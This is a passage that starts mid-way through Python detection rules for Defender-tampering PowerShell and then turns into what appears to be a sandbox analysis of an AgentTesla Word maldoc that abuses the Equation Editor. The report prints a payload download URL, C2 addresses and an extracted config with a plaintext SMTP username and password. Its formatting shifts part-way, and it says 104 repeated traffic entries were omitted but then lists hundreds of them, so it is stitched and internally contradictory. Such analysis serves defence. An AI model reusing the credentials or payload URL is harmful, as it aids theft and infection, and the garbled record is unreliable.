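    Event("process", 4001, r"C:\Windows\splwow64.exe", "splwow64.exe 12288", 2736, WORD),
    Event("process", 4002, PS, "powershell.exe Get-MpPreference", 4000, r"C:\Windows\explorer.exe"),
    Event("dns", 4003, r"C:\Program Files\Mozilla Firefox\firefox.exe", target="api.ipify.org"),
]

if __name__ == "__main__":
    for a in run_rules(SAMPLE_EVENTS):
        print(f"{a['rule']:32} pid={a['pid']:<5} {a['chain']}")
```

Two caveats when turning this into production logic. Add-MpPreference requires administrative rights, so whether the exclusion actually took effect depends on the privileges of the user who opened the document; the command line is worth alerting on either way, and on a live host the outcome can be confirmed with Get-MpPreference (the ExclusionPath property) and Get-ScheduledTask -TaskPath '\Updates\'. The Defender rule here matches only the plaintext cmdlet; the report's "Base64 Encoded MpPreference Cmdlet" Sigma match covers the -EncodedCommand variant, which needs the argument decoded before the same substring test is applied.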
                    No Snort rule has matched
                    AV Detection

Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}
Source: covid19help.top | Virustotal: Detection: 24%
Source: https://covid19help.top/xobizx.scr | Virustotal: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr | Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Virustotal: Detection: 47%
Source: Scan 368 1.doc | Virustotal: Detection: 47%
Source: Scan 368 1.doc | ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr | Joe Sandbox ML: detected

                    Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Network connect: IP: 172.67.175.222 Port: 443
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\obimohohj75.scr (reported twice; the process tree shows two instances, PIDs 3128 and 3512)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding (reported twice; the process tree shows two instances, PIDs 2152 and 3140)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49164 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49165 version: TLS 1.2

                    Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Code function: 4x nop then jmp 00710C95h (function 5_2_0071064B)
Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Code function: 4x nop then jmp 008D0C95h (function 13_2_008D064B)
Source: global traffic | DNS query: name: covid19help.top
Source: global traffic | DNS query: name: api.ipify.org (4 queries)
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
Source: global traffic | TCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
Source: global traffic | TCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443 (104 further identical entries for this flow in the original report omitted)
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 172.67.175.222:443 -> 192.168.2.22:49163
                    Source: global traffic | TCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
